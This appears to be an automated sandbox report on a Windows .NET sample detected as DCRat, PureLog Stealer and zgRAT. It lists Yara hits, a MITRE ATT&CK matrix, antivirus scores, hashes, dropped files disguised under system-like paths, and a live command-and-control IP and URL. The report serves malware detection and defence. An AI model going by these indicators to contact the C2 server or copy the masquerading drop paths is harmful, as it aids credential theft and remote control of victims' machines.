Source: Yara match	File source: 0000000B.00000002.1859735247.00000000025DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1750679777.0000000002A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1859735247.0000000002727000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OH6KO8NBy1.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EGjcLJxUTLCptztefbFicvsgXASnZ.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EGjcLJxUTLCptztefbFicvsgXASnZ.exe PID: 7992, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: OH6KO8NBy1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.OH6KO8NBy1.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1653332376.0000000000682000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\UserOOBEBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: OH6KO8NBy1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.OH6KO8NBy1.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\UserOOBEBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	11 Process Injection	3 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
OH6KO8NBy1.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
OH6KO8NBy1.exe	100%	Avira	HEUR/AGEN.1323342
OH6KO8NBy1.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\NVJoNfH6eh.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\Osft0y9e1S.bat	100%	Avira	BAT/Delbat.C
C:\Recovery\UserOOBEBroker.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\eMBuAd62pF.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\KMG2LIZgv2.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\RKW7EBQnZE.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\4U0fcSq6WH.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\x0UH1pL55G.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\gzlPEas6c9.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\9ZQNubuJrx.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\9nb3HPdPUQ.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\Ip3Bhi35Fh.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\UserOOBEBroker.exe	100%	Joe Sandbox ML
C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	100%	Joe Sandbox ML
C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	100%	Joe Sandbox ML
C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows NT\TableTextService\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\UserOOBEBroker.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://206.188.197.24	0%	Avira URL Cloud	safe
http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti	0%	Avira URL Cloud	safe
http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://206.188.197.24	EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000005.00000002.1750679777.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000000B.00000002.1859735247.00000000025DD000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000012.00000002.1969052018.0000000002F57000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000017.00000002.2035236957.0000000003117000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000001C.00000002.2143640627.0000000003497000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000021.00000002.2252468797.0000000002B87000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000026.00000002.2364133996.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000002B.00000002.2436835588.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000030.00000002.2506859121.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000036.00000002.2615271369.0000000002CE7000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000003B.00000002.2683215175.0000000002817000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000040.00000002.2794048905.0000000002A87000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	OH6KO8NBy1.exe, 00000000.00000002.1677336320.0000000003227000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000005.00000002.1750679777.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000000B.00000002.1859735247.00000000025DD000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000012.00000002.1969052018.0000000002F57000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000017.00000002.2035236957.0000000003117000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000001C.00000002.2143640627.0000000003497000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000021.00000002.2252468797.0000000002B87000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000026.00000002.2364133996.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000002B.00000002.2436835588.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000030.00000002.2506859121.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000036.00000002.2615271369.0000000002CE7000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 0000003B.00000002.2683215175.0000000002817000.00000004.00000800.00020000.00000000.sdmp, EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000040.00000002.2794048905.0000000002A87000.00000004.00000800.00020000.00000000.sdmp	false		high
http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti	EGjcLJxUTLCptztefbFicvsgXASnZ.exe, 00000040.00000002.2794048905.0000000002A87000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
206.188.197.24	unknown	United States		55002	DEFENSE-NETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583918
Start date and time:	2025-01-03 21:11:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	68
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	OH6KO8NBy1.exe renamed because original name is a hash value
Original Sample Name:	07a0fb75f52c87371c88f48ae80afa1b.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@115/55@0/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 69% Number of executed functions: 590 Number of non-executed functions: 16
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target EGjcLJxUTLCptztefbFicvsgXASnZ.exe, PID 7508 because it is empty
Execution Graph export aborted for target EGjcLJxUTLCptztefbFicvsgXASnZ.exe, PID 7716 because it is empty
Execution Graph export aborted for target EGjcLJxUTLCptztefbFicvsgXASnZ.exe, PID 7992 because it is empty
Execution Graph export aborted for target OH6KO8NBy1.exe, PID 7476 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: OH6KO8NBy1.exe

Simulations

Behavior and APIs

Time	Type	Description
15:12:04	API Interceptor	12x Sleep call for process: EGjcLJxUTLCptztefbFicvsgXASnZ.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
206.188.197.24	7vP2IvNXqx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DEFENSE-NETUS	7vP2IvNXqx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	206.188.197.24
	DEMONS.spc.elf	Get hash	malicious	Unknown	Browse	107.162.185.251
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	170.158.166.84
	676556be12ac3.vbs	Get hash	malicious	Mint Stealer	Browse	206.188.197.242
	PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.hta	Get hash	malicious	Mint Stealer	Browse	206.188.197.242
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	107.162.185.253
	home.mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	170.158.122.12
	bpaymentcopy.exe	Get hash	malicious	HawkEye, MailPassView, PredatorPainRAT	Browse	207.204.50.48
	phish_alert_iocp_v1.4.48 (80).eml	Get hash	malicious	InvoiceScam	Browse	107.162.175.186
	2stage.ps1	Get hash	malicious	Unknown	Browse	206.188.196.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	7vP2IvNXqx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
C:\Program Files\Windows NT\TableTextService\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe	7vP2IvNXqx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe	7vP2IvNXqx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Windows NT\Accessories\en-GB\1a5d5b8dcee3d8

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	ASCII text, with very long lines (316), with no line terminators
Category:	dropped
Size (bytes):	316
Entropy (8bit):	5.796941975125064
Encrypted:	false
SSDEEP:	6:Opjk/GsvcHSdZ/SrzizoXk+cHSJCJoCIyXQnkttZVJcqC:Opjk/rvcydo6D+cHScQnkBS
MD5:	4644DA9C59BA94E3FCB3E355B0BECF97
SHA1:	92927C5011634CF9F4731AABB5EC91EB0DE98BD0
SHA-256:	74DAD4ABF9D97BC4A04F7C899AB73E30927D88CA2ECC8FDF325A122A396FCA8E
SHA-512:	8CB372F677BAAA351566113728766A09D7E3E686253A004742162122922EE734B11C2F8AFF159145F30CCB91429F6012B9A93A7BCE6C74C80DC80B8062B78C74
Malicious:	false
Preview:	BGZoiVeTt1XCo2QONVEzbYfPU9qIis6XMuMPQINLRXMNfCnrAph0JZ1nlKUioVvB5Az4qA7EH2iEMStSW9I2KFNx3joGyog5mKRfMsB9sdtQ0wbSaBMpM310wCBHW0PcWmcBAOFn8IJrW66GHVqwc1stTbsKr4n1NQ4OUZSL5irEtJdzF59AKdAe3srig56EfSdFCsvsDe04Ko9J72Ew5mquQZUlstpAmmiaqXxXJQ7qmGUOtiln0JJ3ltzmXJATy0RhGjdjFrmooAHJEG2KICJcdoz6iK99Qo1vyxIKEBiJgePllphRR0LwryDb

C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1656320
Entropy (8bit):	7.420770523484582
Encrypted:	false
SSDEEP:	24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
MD5:	07A0FB75F52C87371C88F48AE80AFA1B
SHA1:	A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
SHA-256:	51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
SHA-512:	0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:	Filename: 7vP2IvNXqx.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......\|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z~....:.... ....8&.....(....*

C:\Program Files (x86)\Windows NT\Accessories\en-GB\Memory Compression.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Uninstall Information\3569ad0d0ffd50

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	ASCII text, with very long lines (597), with no line terminators
Category:	dropped
Size (bytes):	597
Entropy (8bit):	5.868801611576755
Encrypted:	false
SSDEEP:	12:xRJGCCzAmoiRTussqg2f9QROZFXBOGHjrmOhdC13mpuBwn:xNOAmZKsxg4icZVBOG9dwKuBwn
MD5:	C1E201CC0799AC723313B0755557E8F2
SHA1:	A5714DA911FDF87AF7C6C8C40DBB8B70AA4CE4EE
SHA-256:	5C16EF4F647A952121C92E1944543459B8A0B1E6D2C48D86D938BF643ACBCCC8
SHA-512:	ACA6F2D7C192296529A8DA1A33F4BC3221FE87113A874FD8CD96AC46D5472614D2266926C2962C7F9F38C3D2FC1D0FC70DF98C21379E233112B5DEFF9C9C736A
Malicious:	false
Preview:	IenfOetPjz7WvpF0PWvmtWb2m2le8AhQt6SQ8uly7VldKvXUUl2frQ1vDv3W3PRjRqmyXy2fu6oXv7s1eRJWICjdEgNN1O5sECMeIi7ftWuumeAFCB1lG4aPGJu0lonfA6StvOt5UnmvSz1kgHK0WUlJl6X8yG4EtOtqLQUyS6QdSp7RSJTdexJqUJIy1uGNshCDFKZPwVhaDI159Fqpwbk5FCVCIg7hzDuun3MHtEqIPsnLRMyvDbbR7G8DzXGQXAlAYHSG3j5subpWYJu6rMeXlcwg4JSW7auPHnxJ4s2egsggblopmKiLgNY5UwMuQiuUqZPvWlB9T9136QESfnuw1it3P2zHfIN88MzBW2SBIi2gWf9Er3Ony7dHqVgdv4dKv24taD5mUsoSqNhu3uam3kJAtsVBWzPOErvdkPno7mTFTKbdywkBd1RLs4Ass4PedZN8bDJoGwoQQEqiR2MkPOuNakupO56CXyl46cBum54rNA4oNbbzrpPPoAi1TeZLzl3bcwmy0c8TTCAZpGbweGVrjWP63JbIfs1lGcLbzm8Pq65lAIMMCnrtQL2Ggp4rBzxlLYTM4A61HFAma

C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1656320
Entropy (8bit):	7.420770523484582
Encrypted:	false
SSDEEP:	24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
MD5:	07A0FB75F52C87371C88F48AE80AFA1B
SHA1:	A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
SHA-256:	51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
SHA-512:	0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:	Filename: 7vP2IvNXqx.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......\|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z~....:.... ....8&.....(....*

C:\Program Files\Uninstall Information\EGjcLJxUTLCptztefbFicvsgXASnZ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Windows NT\TableTextService\en-US\3569ad0d0ffd50

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	ASCII text, with very long lines (914), with no line terminators
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.907816248507255
Encrypted:	false
SSDEEP:	24:kuwGr/jCcBzKq8tzK9/N0YwHWMgu0aE/Rc2trd5r37WZb:ku9r/jvx+A5CvWaE/hrLrrWZb
MD5:	78C59A3D849FE83979CBC0FC700CA048
SHA1:	7BE5805C4F9D36C41E0D82822482A0C321ABBF43
SHA-256:	D38F50F8B7C74E2D1522916EFDD8AAE60F7F32E29492B15662C26F399F86E1F9
SHA-512:	0A9A72B0D7B3C2FFA9016E1F106E5DA50B8165E1C7162FF26545DFDF90E16379553C82BA1B2FD6B10B4D3D65362D6249DF5C18F5806FA854AC7A289B5B2C9D1F
Malicious:	false
